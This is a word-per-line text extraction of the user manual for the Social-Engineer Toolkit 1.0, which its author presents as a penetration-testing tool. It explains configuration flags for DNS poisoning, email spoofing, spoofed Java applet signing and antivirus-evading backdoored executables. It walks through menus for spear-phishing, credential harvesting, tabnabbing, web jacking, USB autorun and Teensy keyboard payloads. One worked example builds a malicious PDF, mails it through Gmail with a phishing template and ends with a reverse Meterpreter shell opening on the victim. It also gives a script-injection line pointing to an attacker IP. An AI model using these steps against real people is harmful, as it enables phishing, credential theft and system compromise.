SET User Manual
SET User Manual
SET User Manual
Official
User
Manual
Made
for
version
1.0
By
David
Kennedy
(Re1LK)
davek@social-engineer.org
http://www.secmaniac.com
http://www.social-engineer.org
Download:
svn
co
http://svn.secmaniac.com/social_engineering_toolkit
set/
Table
of
Contents
Beginning
with
the
Social
Engineer
Toolkit
...................................................................
3
SET
Menus
.................................................................................................................................
7
Spear-Phishing
Attack
Vector
...........................................................................................
12
Java
Applet
Attack
Vector
..................................................................................................
17
Metasploit
Browser
Exploit
Method
..............................................................................
24
Credential
Harvester
Attack
Method
.............................................................................
28
Tabnabbing
Attack
Method
...............................................................................................
33
Man
Left
in
the
Middle
Attack
Method
..........................................................................
35
Web
Jacking
Attack
Method
..............................................................................................
36
Multi-Attack
Web
Vector
....................................................................................................
39
Infectious
Media
Generator
..............................................................................................
49
Teensy
USB
HID
Attack
Vector
.........................................................................................
53
SMS
Spoofing
Attack
Vector
..............................................................................................
59
SET
Automation
.....................................................................................................................
61
SET
Web-Interface
................................................................................................................
65
Frequently
Asked
Questions
.............................................................................................
67
irc.freenode.net #social-engineer
The
Social-Engineer
Toolkit
(SET)
is
specifically
designed
to
perform
advanced
attacks
against
the
human
element.
SET
was
designed
to
be
released
with
the
http://www.social-engineer.org
launch
and
has
quickly
became
a
standard
tool
in
a
penetration
testers
arsenal.
SET
is
written
by
David
Kennedy
(ReL1K)
and
with
a
lot
of
help
from
the
community
it
has
incorporated
attacks
never
before
seen
in
an
exploitation
toolset.
The
attacks
built
into
the
toolkit
are
designed
to
be
focused
attacks
against
a
person
or
organization
used
during
a
penetration
test.
irc.freenode.net #social-engineer
#
SPECIFY
WHAT
INTERFACE
YOU
WANT
ETTERCAP
TO
LISTEN
ON,
IF
NOTHING
WILL
DEFAULT
#
EXAMPLE:
ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
#
ETTERCAP
HOME
DIRECTORY
(NEEDED
FOR
DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
The
Ettercap
section
can
be
used
when
youre
on
the
same
subnet
as
the
victims
and
you
want
to
perform
DNS
poison
attacks
against
a
subset
of
IP
addresses.
When
this
flag
is
set
to
ON,
it
will
poison
the
entire
local
subnet
and
redirect
a
specific
site
or
all
sites
to
your
malicious
server
running.
#
SENDMAIL
ON
OR
OFF
FOR
SPOOFING
EMAIL
ADDRESSES
SENDMAIL=OFF
Setting
the
SENDMAIL
flag
to
ON
will
try
starting
SENDMAIL,
which
can
spoof
source
email
addresses.
This
attack
only
works
if
the
victims
SMTP
server
does
not
perform
reverse
lookups
on
the
hostname.
SENDMAIL
must
be
installed.
If
your
using
BackTrack
4,
it
is
installed
by
default.
#
SET
TO
ON
IF
YOU
WANT
TO
USE
EMAIL
IN
CONJUNCTION
WITH
WEB
ATTACK
WEBATTACK_EMAIL=OFF
When
setting
the
WEBATTACK_EMAIL
to
ON,
it
will
allow
you
to
send
mass
emails
to
the
victim
while
utilizing
the
Web
Attack
vector.
Traditionally
the
emailing
aspect
is
only
available
through
the
spear-phishing
menu
however
when
this
is
enabled
it
will
add
additional
functionality
for
you
to
be
able
to
email
victims
with
links
to
help
better
your
attacks.
#
CREATE
SELF-SIGNED
JAVA
APPLETS
AND
SPOOF
PUBLISHER
NOTE
THIS
REQUIRES
YOU
TO
#
INSTALL
--->
JAVA
6
JDK,
BT4
OR
UBUNTU
USERS:
apt-get
install
openjdk-6-
jdk
#
IF
THIS
IS
NOT
INSTALLED
IT
WILL
NOT
WORK.
CAN
ALSO
DO
apt-get
install
sun-java6-jdk
SELF_SIGNED_APPLET=OFF
The
Java
Applet
Attack
vector
is
the
attack
with
one
of
the
highest
rates
of
success
that
SET
has
in
its
arsenal.
To
make
the
attack
look
more
believable,
you
can
turn
this
flag
on
which
will
allow
you
to
sign
the
Java
Applet
with
whatever
name
you
want.
Say
your
targeting
CompanyX,
the
standard
Java
Applet
is
signed
by
Microsoft,
you
can
sign
the
applet
with
CompanyX
to
make
it
look
more
believable.
This
will
irc.freenode.net #social-engineer
require
you
to
install
javas
jdk
(in
Ubuntu
its
apt-get
install
sun-java6-jdk
or
openjdk-6-jdk).
#
THIS
FLAG
WILL
SET
THE
JAVA
ID
FLAG
WITHIN
THE
JAVA
APPLET
TO
SOMETHING
DIFFE$
#
THIS
COULD
BE
TO
MAKE
IT
LOOK
MORE
BELIEVABLE
OR
FOR
BETTER
OBFUSCATION
JAVA_ID_PARAM=Secure
Java
Applet
#
#
JAVA
APPLET
REPEATER
OPTION
WILL
CONTINUE
TO
PROMPT
THE
USER
WITH
THE
JAVA
AP$
#
THE
USER
HITS
CANCEL.
THIS
MEANS
IT
WILL
BE
NON
STOP
UNTIL
RUN
IS
EXECUTED.
T$
#
A
BETTER
SUCCESS
RATE
FOR
THE
JAVA
APPLET
ATTACK
JAVA_REPEATER=ON
When
a
user
gets
the
java
applet
warning,
they
will
see
the
Secure
Java
Applet
as
the
name
of
the
Applet
instead
of
the
IP
address.
This
adds
a
better
believability
to
the
java
applet.
The
second
option
will
prompt
the
user
over
and
over
with
nagging
Java
Applet
warnings
if
they
hit
cancel.
This
is
useful
when
the
user
clicks
cancel
and
the
attack
would
be
rendered
useless,
instead
it
will
continue
to
pop
up
over
and
over.
#
AUTODETECTION
OF
IP
ADDRESS
INTERFACE
UTILIZING
GOOGLE,
SET
THIS
ON
IF
YOU
WANT
#
SET
TO
AUTODETECT
YOUR
INTERFACE
AUTO_DETECT=ON
The
AUTO_DETECT
flag
is
probably
one
of
the
most
asked
questions
in
SET.
In
most
cases,
SET
will
grab
the
interface
you
use
in
order
to
connect
out
to
the
Internet
and
use
that
as
the
reverse
connection
and
IP
address.
Most
attacks
need
to
be
customized
and
may
not
be
on
the
internal
network.
If
you
turn
this
flag
to
OFF,
SET
will
prompt
you
with
additional
questions
on
setting
up
the
attack.
This
flag
should
be
used
when
you
want
to
use
multiple
interfaces,
have
an
external
IP,
or
youre
in
a
NAT/Port
forwarding
scenario.
#
SPECIFY
WHAT
PORT
TO
RUN
THE
HTTP
SERVER
OFF
OF
THAT
SERVES
THE
JAVA
APPLET
ATTACK
#
OR
METASPLOIT
EXPLOIT.
DEFAULT
IS
PORT
80.
WEB_PORT=80
By
default
the
SET
web
server
listens
on
port
80,
if
for
some
reason
you
need
to
change
this,
you
can
specify
an
alternative
port.
#
CUSTOM
EXE
YOU
WANT
TO
USE
FOR
METASPLOIT
ENCODING,
THIS
USUALLY
HAS
BETTER
AV
irc.freenode.net
#social-engineer
#
DETECTION.
CURRENTLY
IT
IS
SET
TO
LEGIT.BINARY
WHICH
IS
JUST
CALC.EXE.
AN
EXAMPLE
#
YOU
COULD
USE
WOULD
BE
PUTTY.EXE
SO
THIS
FIELD
WOULD
BE
/pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary
When
using
the
payload
encoding
options
of
SET,
the
best
option
for
Anti-Virus
bypass
is
the
backdoored,
or
loaded
with
a
malicious
payload
hidden
in
the
exe,
executable
option.
Specifically
an
exe
is
backdoored
with
a
Metasploit
based
payload
and
can
generally
evade
most
AVs
out
there.
SET
has
an
executable
built
into
it
for
the
backdooring
of
the
exe
however
if
for
some
reason
you
want
to
use
a
different
executable,
you
can
specify
the
path
to
that
exe
with
the
CUSTOM_EXE
flag.
#
USE
APACHE
INSTEAD
OF
STANDARD
PYTHON
WEB
SERVERS,
THIS
WILL
INCREASE
SPEED
OF
#
THE
ATTACK
VECTOR
APACHE_SERVER=OFF
#
#
PATH
TO
THE
APACHE
WEBROOT
APACHE_DIRECTORY=/var/www
The
web
server
utilized
within
SET
is
a
custom-coded
web
server
that
at
times
can
be
somewhat
slow
based
off
of
the
needs.
If
you
find
that
you
need
a
boost
and
want
to
utilize
Apache,
you
can
flip
this
switch
to
ON
and
it
will
use
Apache
to
handle
the
web
requests
and
speed
your
attack
up.
Note
that
this
attack
only
works
with
the
Java
Applet
and
Metasploit
based
attacks.
Based
on
the
interception
of
credentials,
Apache
cannot
be
used
with
the
web
jacking,
tabnabbing,
or
credential
harvester
attack
methods.
#
TURN
ON
SSL
CERTIFICATES
FOR
SET
SECURE
COMMUNICATIONS
THROUGH
WEB_ATTACK
VECTOR
WEBATTACK_SSL=OFF
#
#
PATH
TO
THE
PEM
FILE
TO
UTILIZE
CERTIFICATES
WITH
THE
WEB
ATTACK
VECTOR
(REQUIRED)
#
YOU
CAN
CREATE
YOUR
OWN
UTILIZING
SET,
JUST
TURN
ON
SELF_SIGNED_CERT
#
IF
YOUR
USING
THIS
FLAG,
ENSURE
OPENSSL
IS
INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
#
BELOW
IS
THE
CLIENT/SERVER
(PRIVATE)
CERT,
THIS
MUST
BE
IN
PEM
FORMAT
IN
ORDER
TO
WORK
#
SIMPLY
PLACE
THE
PATH
YOU
WANT
FOR
EXAMPLE
/root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
irc.freenode.net
#social-engineer
PEM_SERVER=/root/newreq.pem
In
some
cases
when
your
performing
an
advanced
social-engineer
attack
you
may
want
to
register
a
domain
and
buy
an
SSL
cert
that
makes
the
attack
more
believable.
You
can
incorporate
SSL
based
attacks
with
SET.
You
will
need
to
turn
the
WEBATTACK_SSL
to
ON.
If
you
want
to
use
self-signed
certificates
you
can
as
well
however
there
will
be
an
untrusted
warning
when
a
victim
goes
to
your
website.
TWEAK
THE
WEB
JACKING
TIME
USED
FOR
THE
IFRAME
REPLACE,
SOMETIMES
IT
CAN
BE
A
LITTLE
SLOW
#
AND
HARDER
TO
CONVINCE
THE
VICTIM.
5000
=
5
seconds
WEBJACKING_TIME=2000
The
webjacking
attack
is
performed
by
replacing
the
victims
browser
with
another
window
that
is
made
to
look
and
appear
to
be
a
legitimate
site.
This
attack
is
very
dependant
on
timing,
if
your
doing
it
over
the
Internet,
I
recommend
the
delay
to
be
5000
(5
seconds)
otherwise
if
your
internal,
2000
(2
seconds)
is
probably
a
safe
bet.
The
command
center
is
the
web
GUI
interface
for
the
Social-Engineer
Toolkit.
If
you
want
to
use
this
on
a
different
port,
change
this
number.
The
next
option
will
specify
what
interface
to
listen
on
for
the
SET
web
interface.
If
its
set
to
127.0.0.1,
it
eans
that
no
one
from
outside
on
the
network
can
hit
the
web
interface.
If
you
place
it
to
0.0.0.0,
it
will
bind
to
all
interfaces
and
it
can
be
reached
remotely.
Be
careful
with
this
setting.
The
encount
flag
determines
how
many
times
a
payload
will
be
encoded
with
Metasploit
payloads
when
in
SET.
By
default
its
4,
but
if
you
require
less
or
more,
you
can
adjust
this
accordingly.
SET
Menus
irc.freenode.net
#social-engineer
SET
is
a
menu
driven
based
attack
system,
which
is
fairly
unique
when
it
comes
to
hacker
tools.
The
decision
not
to
make
it
command
line
was
made
because
of
how
social-engineer
attacks
occur;
it
requires
multiple
scenarios,
options,
and
customizations.
If
the
tool
had
been
command
line
based
it
would
have
really
limited
the
effectiveness
of
the
attacks
and
the
inability
to
fully
customize
it
based
on
your
target.
Lets
dive
into
the
menu
and
do
a
brief
walkthrough
of
each
attack
vector.
root@bt:/pentest/exploits/set#
./set
[---]
The
Social-Engineer
Toolkit
(SET)
[---]
[---]
Written
by
David
Kennedy
(ReL1K)
[---]
[---]
Version:
1.0
[---]
[---]
Codename:
'Ninja
Edition'
[---]
[---]
Report
bugs
to:
davek@social-engineer.org
[---]
[---]
Follow
Me
On
Twitter:
dave_rel1k
[---]
[---]
Java
Applet
Written
by:
Thomas
Werth
[---]
[---]
Homepage:
http://www.secmaniac.com
[---]
[---]
Framework:
http://www.social-engineer.org
[---]
[---]
Over
1.4
million
downloads
and
counting.
[---]
Welcome
to
the
Social-Engineer
Toolkit
(SET).
Your
one
stop
shop
for
all
of
your
social-engineering
needs..
DerbyCon
2011
Sep30-Oct02
-
http://www.derbycon.com
Select
from
the
menu:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
1
Welcome
to
the
SET
E-Mail
attack
method.
This
module
allows
you
to
specially
craft
email
messages
and
send
them
to
a
large
(or
small)
number
of
people
with
attached
fileformat
malicious
payloads.
If
you
want
to
spoof
irc.freenode.net
#social-engineer
your
email
address,
be
sure
"Sendmail"
is
installed
(it
is
installed
in
BT4)
and
change
the
config/set_config
SENDMAIL=OFF
flag
to
SENDMAIL=ON.
There
are
two
options,
one
is
getting
your
feet
wet
and
letting
SET
do
everything
for
you
(option
1),
the
second
is
to
create
your
own
FileFormat
payload
and
use
it
in
your
own
attack.
Either
way,
good
luck
and
enjoy!
1.
Perform
a
Mass
Email
Attack
2.
Create
a
FileFormat
Payload
3.
Create
a
Social-Engineering
Template
4.
Return
to
Main
Menu
Enter
your
choice:
The
spear-phishing
attack
menu
is
used
for
performing
targeted
email
attacks
against
a
victim.
You
can
send
multiple
emails
based
on
what
your
harvested
or
you
can
send
it
to
individuals.
You
can
also
utilize
fileformat
(for
example
a
PDF
bug)
and
send
the
malicious
attack
to
the
victim
in
order
to
hopefully
compromise
the
system.
Select
from
the
menu:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7
Update
the
Metasploit
Framework
8.
Update
the
Social-Engineer
Toolkit
9.
Help,
Credits,
and
About
10.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
2
The
Social-Engineer
Toolkit
"Web
Attack"
vector
is
a
unique
way
of
utilizing
multiple
web-based
attacks
in
order
to
compromise
the
intended
victim.
Enter
what
type
of
attack
you
would
like
to
utilize.
The
Java
Applet
attack
will
spoof
a
Java
Certificate
and
deliver
a
Metasploit
based
payload.
Uses
a
customized
java
applet
created
by
Thomas
Werth
to
deliver
the
payload.
The
Metasploit
browser
exploit
method
will
utilize
select
Metasploit
browser
exploits
through
an
iframe
and
deliver
a
Metasploit
payload.
irc.freenode.net
#social-engineer
The
Credential
Harvester
Method
will
utilize
web
cloning
of
a
website
that
has
a
username
and
password
field
and
harvest
all
the
information
posted
to
the
website.
The
TabNabbing
Method
will
wait
for
a
user
to
move
to
a
different
tab,
then
refresh
the
page
to
something
different.
The
Man
Left
in
the
Middle
Attack
Method
was
introduced
by
Kos
and
utilizes
HTTP
REFERER's
in
order
to
intercept
fields
and
harvest
data
from
them.
You
need
to
have
an
already
vulnerable
site
and
incorporate
<script
src="http://YOURIP/">.
This
could
either
be
from
a
compromised
site
or
through
XSS.
The
web
jacking
attack
method
was
introduced
by
white_sheep,
Emgent
and
the
Back|Track
team.
This
method
utilizes
iframe
replacements
to
make
the
highlighted
URL
link
to
appear
legitimate
however
when
clicked
a
window
pops
up
then
is
replaced
with
the
malicious
link.
You
can
edit
the
link
replacement
settings
in
the
set_config
if
its
to
slow/fast.
The
multi-attack
will
add
a
combination
of
attacks
through
the
web
attack
menu.
For
example
you
can
utilize
the
Java
Applet,
Metasploit
Browser,
Credential
Harvester/Tabnabbing,
and
the
Man
Left
in
the
Middle
attack
all
at
once
to
see
which
is
successful.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
The
web
attack
vector
is
used
by
performing
phishing
attacks
against
the
victim
in
hopes
they
click
the
link.
There
is
a
wide-variety
of
attacks
that
can
occur
once
they
click.
We
will
dive
into
each
one
of
the
attacks
later
on.
3.
Infectious
Media
Generator
The
infectious
USB/DVD
creator
will
develop
a
Metasploit
based
payload
for
you
and
craft
an
autorun.inf
file
that
once
burned
or
placed
on
a
USB
will
trigger
an
autorun
feature
and
hopefully
compromise
the
system.
This
attack
vector
is
irc.freenode.net #social-engineer
10
relatively
simple
in
nature
and
relies
on
deploying
the
devices
to
the
physical
system.
4.
Create
a
Payload
and
Listener
The
create
payload
and
listener
is
an
extremely
simple
wrapper
around
Metasploit
to
create
a
payload,
export
the
exe
for
you
and
generate
a
listener.
You
would
need
to
transfer
the
exe
onto
the
victim
machine
and
execute
it
in
order
for
it
to
properly
work.
5.
Mass
Mailer
Attack
The
mass
mailer
attack
will
allow
you
to
send
multiple
emails
to
victims
and
customize
the
messages.
This
option
does
not
allow
you
to
create
payloads,
so
it
is
generally
used
to
perform
a
mass
phishing
attack.
Select
from
the
menu:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
6
Welcome
to
the
Teensy
HID
Attack
Vector.
Special
thanks
to:
IronGeek
and
WinFang
The
Teensy
HID
Attack
Vector
utilizes
the
teensy
USB
device
to
program
the
device
to
act
as
a
keyboard.
Teensy's
have
onboard
storage
and
can
allow
for
remote
code
execution
on
the
physical
system.
Since
the
devices
are
registered
as
USB
Keyboard's
it
will
bypass
any
autorun
disabled
or
endpoint
protection
on
the
system.
You
will
need
to
purchase
the
Teensy
USB
device,
it's
roughly
$22
dollars.
This
attack
vector
will
auto
generate
the
code
needed
in
order
to
deploy
the
payload
on
the
system
for
you.
irc.freenode.net
#social-engineer
11
This
attack
vector
will
create
the
.pde
files
necessary
to
import
into
Arduino
(the
IDE
used
for
programming
the
Teensy).
The
attack
vectors
range
from
Powershell
based
downloaders,
wscript
attacks,
and
other
methods.
For
more
information
on
specifications
and
good
tutorials
visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-
keystroke-dongle
To
purchase
a
Teensy,
visit:
http://www.pjrc.com/store/teensy.html
Select
a
payload
to
create
the
pde
file
to
import
into
Arduino:
1.
Powershell
HTTP
GET
MSF
Payload
2.
WSCRIPT
HTTP
GET
MSF
Payload
3.
Powershell
based
Reverse
Shell
4.
Return
to
the
main
menu.
Enter
your
choice:
The
teensy
USB
HID
attack
is
a
method
used
by
purchasing
a
hardware
based
device
from
prjc.com
and
programming
it
in
a
manner
that
makes
the
small
USB
microcontroller
to
look
and
feel
exactly
like
a
keyboard.
The
important
part
with
this
is
it
bypasses
autorun
capabilities
and
can
drop
payloads
onto
the
system
through
the
onboard
flash
memory.
The
keyboard
simulation
allows
you
to
type
characters
in
a
manner
that
can
utilize
downloaders
and
exploit
the
system.
7
Update
the
Metasploit
Framework
8.
Update
the
Social-Engineer
Toolkit
9.
Help,
Credits,
and
About
10.
Exit
the
Social-Engineer
Toolkit
The
following
menus
will
perform
updates
on
Metasploit,
the
Social-Engineer
Toolkit,
provide
help
and
credits,
and
lastly
exit
the
Social-Engineer
Toolkit
(why
would
you
ever
want
to
do
that?!).
As
mentioned
previously,
the
spear
phishing
attack
vector
can
be
used
to
send
targeted
emails
with
malicious
attachments.
In
this
example
we
are
going
to
craft
an
attack,
integrate
into
GMAIL
and
send
a
malicious
PDF
to
the
victim.
One
thing
to
irc.freenode.net #social-engineer
12
note
is
you
can
create
and
save
your
own
templates
to
use
for
future
SE
attacks
or
you
can
use
pre-built
ones.
When
using
SET
just
to
note
that
when
hitting
enter
for
defaults,
it
will
always
be
port
443
as
the
reverse
connection
back
and
a
reverse
Meterpreter.
Select
from
the
menu:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
1
Welcome
to
the
SET
E-Mail
attack
method.
This
module
allows
you
to
specially
craft
email
messages
and
send
them
to
a
large
(or
small)
number
of
people
with
attached
fileformat
malicious
payloads.
If
you
want
to
spoof
your
email
address,
be
sure
"Sendmail"
is
installed
(it
is
installed
in
BT4)
and
change
the
config/set_config
SENDMAIL=OFF
flag
to
SENDMAIL=ON.
There
are
two
options,
one
is
getting
your
feet
wet
and
letting
SET
do
everything
for
you
(option
1),
the
second
is
to
create
your
own
FileFormat
payload
and
use
it
in
your
own
attack.
Either
way,
good
luck
and
enjoy!
1.
Perform
a
Mass
Email
Attack
2.
Create
a
FileFormat
Payload
3.
Create
a
Social-Engineering
Template
4.
Return
to
Main
Menu
Enter
your
choice:
1
Select
the
file
format
exploit
you
want.
The
default
is
the
PDF
embedded
EXE.
**********
PAYLOADS
**********
1.
SET
Custom
Written
DLL
Hijacking
Attack
Vector
(RAR,
ZIP)
irc.freenode.net
#social-engineer
13
2.
Adobe
Flash
Player
'Button'
Remote
Code
Execution
3.
Adobe
CoolType
SING
Table
'uniqueName'
Overflow
4.
Adobe
Flash
Player
'newfunction'
Invalid
Pointer
Use
5.
Adobe
Collab.collectEmailInfo
Buffer
Overflow
6.
Adobe
Collab.getIcon
Buffer
Overflow
7.
Adobe
JBIG2Decode
Memory
Corruption
Exploit
8.
Adobe
PDF
Embedded
EXE
Social
Engineering
9.
Adobe
util.printf()
Buffer
Overflow
10.
Custom
EXE
to
VBA
(sent
via
RAR)
(RAR
required)
11.
Adobe
U3D
CLODProgressiveMeshDeclaration
Array
Overrun
12.
Adobe
PDF
Embedded
EXE
Social
Engineering
(NOJS)
Enter
the
number
you
want
(press
enter
for
default):
1
1.
Windows
Reverse
TCP
Shell
2.
Windows
Meterpreter
Reverse_TCP
3.
Windows
Reverse
VNC
4.
Windows
Reverse
TCP
Shell
(x64)
5.
Windows
Meterpreter
Reverse_TCP
(X64)
6.
Windows
Shell
Bind_TCP
(X64)
Enter
the
payload
you
want
(press
enter
for
default):
[*]
Windows
Meterpreter
Reverse
TCP
selected.
Enter
the
port
to
connect
back
on
(press
enter
for
default):
[*]
Defaulting
to
port
443...
[*]
Generating
fileformat
exploit...
[*]
Please
wait
while
we
load
the
module
tree...
[*]
Started
reverse
handler
on
172.16.32.129:443
[*]
Creating
'template.pdf'
file...
[*]
Generated
output
file
/pentest/exploits/set/src/program_junk/template.pdf
[*]
Payload
creation
complete.
[*]
All
payloads
get
sent
to
the
src/msf_attacks/template.pdf
directory
[*]
Payload
generation
complete.
Press
enter
to
continue.
As
an
added
bonus,
use
the
file-format
creator
in
SET
to
create
your
attachment.
Right
now
the
attachment
will
be
imported
with
filename
of
'template.whatever'
Do
you
want
to
rename
the
file?
example
Enter
the
new
filename:
moo.pdf
irc.freenode.net
#social-engineer
14
1.
Keep
the
filename,
I
don't
care.
2.
Rename
the
file,
I
want
to
be
cool.
Enter
your
choice
(enter
for
default):
1
Keeping
the
filename
and
moving
on.
Social
Engineer
Toolkit
Mass
E-Mailer
There
are
two
options
on
the
mass
e-mailer,
the
first
would
be
to
send
an
email
to
one
individual
person.
The
second
option
will
allow
you
to
import
a
list
and
send
it
to
as
many
people
as
you
want
within
that
list.
What
do
you
want
to
do:
1.
E-Mail
Attack
Single
Email
Address
2.
E-Mail
Attack
Mass
Mailer
3.
Return
to
main
menu.
Enter
your
choice:
1
Do
you
want
to
use
a
predefined
template
or
craft
a
one
time
email
template.
1.
Pre-Defined
Template
2.
One-Time
Use
Email
Template
Enter
your
choice:
1
Below
is
a
list
of
available
templates:
1:
Baby
Pics
2:
Strange
Internet
usage
from
your
computer
3:
New
Update
4:
LOL...have
to
check
this
out...
5:
Dan
Brown's
Angels
&
Demons
6:
Computer
Issue
7:
Status
Report
Enter
the
number
you
want
to
use:
7
Enter
who
you
want
to
send
email
to:
kennedyd013@gmail.com
What
option
do
you
want
to
use?
1.
Use
a
GMAIL
Account
for
your
email
attack.
2.
Use
your
own
server
or
open
relay
irc.freenode.net
#social-engineer
15
Enter
your
choice:
1
Enter
your
GMAIL
email
address:
kennedyd013@gmail.com
Enter
your
password
for
gmail
(it
will
not
be
displayed
back
to
you):
SET
has
finished
delivering
the
emails.
Do
you
want
to
setup
a
listener
yes
or
no:
yes
[-]
***
[-]
*
WARNING:
No
database
support:
String
User
Disabled
Database
Support
[-]
***
|
|
_)
|
__
`__
\
_
\
__|
_`
|
__|
__
\
|
_
\
|
__|
|
|
|
__/
|
(
|\__
\
|
|
|
(
|
|
|
_|
_|
_|\___|\__|\__,_|____/
.__/
_|\___/
_|\__|
_|
=[
metasploit
v3.4.2-dev
[core:3.4
api:1.0]
+
--
--=[
588
exploits
-
300
auxiliary
+
--
--=[
224
payloads
-
27
encoders
-
8
nops
=[
svn
r10268
updated
today
(2010.09.09)
resource
(src/program_junk/meta_config)>
use
exploit/multi/handler
resource
(src/program_junk/meta_config)>
set
PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD
=>
windows/meterpreter/reverse_tcp
resource
(src/program_junk/meta_config)>
set
LHOST
172.16.32.129
LHOST
=>
172.16.32.129
resource
(src/program_junk/meta_config)>
set
LPORT
443
LPORT
=>
443
resource
(src/program_junk/meta_config)>
set
ENCODING
shikata_ga_nai
ENCODING
=>
shikata_ga_nai
resource
(src/program_junk/meta_config)>
set
ExitOnSession
false
ExitOnSession
=>
false
resource
(src/program_junk/meta_config)>
exploit
-j
[*]
Exploit
running
as
background
job.
msf
exploit(handler)
>
[*]
Started
reverse
handler
on
172.16.32.129:443
[*]
Starting
the
payload
handler...
msf
exploit(handler)
>
Once
the
attack
is
all
setup,
the
victim
opens
the
email
and
opens
the
PDF
up:
irc.freenode.net
#social-engineer
16
As
soon
as
the
victim
opens
the
attachment
up,
a
shell
is
presented
back
to
us:
[*]
Sending
stage
(748544
bytes)
to
172.16.32.131
[*]
Meterpreter
session
1
opened
(172.16.32.129:443
->
172.16.32.131:1139)
at
Thu
Sep
09
09:58:06
-0400
2010
msf
exploit(handler)
>
sessions
-i
1
[*]
Starting
interaction
with
1...
meterpreter
>
shell
Process
3940
created.
Channel
1
created.
Microsoft
Windows
XP
[Version
5.1.2600]
(C)
Copyright
1985-2001
Microsoft
Corp.
C:\Documents
and
Settings\Administrator\Desktop>
The
spear-phishing
attack
can
send
to
multiple
people
or
individuals,
it
integrates
into
Google
mail
and
can
be
completely
customized
based
on
your
needs
for
the
attack
vector.
Overall
this
is
very
effective
for
email
spear-phishing.
The
Java
Applet
is
one
of
the
core
attack
vectors
within
SET
and
the
highest
success
rate
for
compromise.
The
Java
Applet
attack
will
create
a
malicious
Java
Applet
that
once
run
will
completely
compromise
the
victim.
The
neat
trick
with
SET
is
that
you
can
completely
clone
a
website
and
once
the
victim
has
clicked
run,
it
will
redirect
the
victim
back
to
the
original
site
making
the
attack
much
more
believable.
This
attack
vector
affects
Windows,
Linux,
and
OSX
and
can
compromise
them
all.
Remember
if
you
want
to
customize
this
attack
vector,
edit
the
config/set_config
in
order
to
change
the
self-signed
information.
In
this
specific
attack
vector,
you
can
select
web
templates
which
are
pre-defined
websites
that
have
already
been
harvested,
or
you
can
import
your
own
website.
In
this
example
we
will
be
using
the
site
cloner
which
will
clone
a
website
for
us.
Lets
launch
SET
and
prep
our
attack.
irc.freenode.net
#social-engineer
17
Select
from
the
menu:
1.
Spear-Phishing
Attack
Vectors
2.
Website
Attack
Vectors
3.
Infectious
Media
Generator
4.
Create
a
Payload
and
Listener
5.
Mass
Mailer
Attack
6.
Teensy
USB
HID
Attack
Vector
7.
SMS
Spoofing
Attack
Vector
8
Update
the
Metasploit
Framework
9.
Update
the
Social-Engineer
Toolkit
10.
Help,
Credits,
and
About
11.
Exit
the
Social-Engineer
Toolkit
Enter
your
choice:
2
The
Social-Engineer
Toolkit
"Web
Attack"
vector
is
a
unique
way
of
utilizing
multiple
web-based
attacks
in
order
to
compromise
the
intended
victim.
Enter
what
type
of
attack
you
would
like
to
utilize.
The
Java
Applet
attack
will
spoof
a
Java
Certificate
and
deliver
a
metasploit
based
payload.
Uses
a
customized
java
applet
created
by
Thomas
Werth
to
deliver
the
payload.
The
Metasploit
browser
exploit
method
will
utilize
select
Metasploit
browser
exploits
through
an
iframe
and
deliver
a
Metasploit
payload.
The
Credential
Harvester
Method
will
utilize
web
cloning
of
a
website
that
has
a
username
and
password
field
and
harvest
all
the
information
posted
to
the
website.
The
TabNabbing
Method
will
wait
for
a
user
to
move
to
a
different
tab,
then
refresh
the
page
to
something
different.
The
Man
Left
in
the
Middle
Attack
Method
was
introduced
by
Kos
and
utilizes
HTTP
REFERER's
in
order
to
intercept
fields
and
harvest
data
from
them.
You
need
to
have
an
already
vulnerable
site
and
incorporate
<script
src="http://YOURIP/">.
This
could
either
be
from
a
compromised
site
or
through
XSS.
The
web
jacking
attack
method
was
introduced
by
white_sheep,
Emgent
and
the
Back|Track
team.
This
method
utilizes
iframe
replacements
to
make
the
highlighted
URL
link
to
appear
legitimate
however
when
clicked
a
window
pops
up
then
is
replaced
with
the
malicious
link.
You
can
edit
irc.freenode.net
#social-engineer
18
the
link
replacement
settings
in
the
set_config
if
its
to
slow/fast.
The
multi-attack
will
add
a
combination
of
attacks
through
the
web
attack
menu.
For
example
you
can
utilize
the
Java
Applet,
Metasploit
Browser,
Credential
Harvester/Tabnabbing,
and
the
Man
Left
in
the
Middle
attack
all
at
once
to
see
which
is
successful.
1.
The
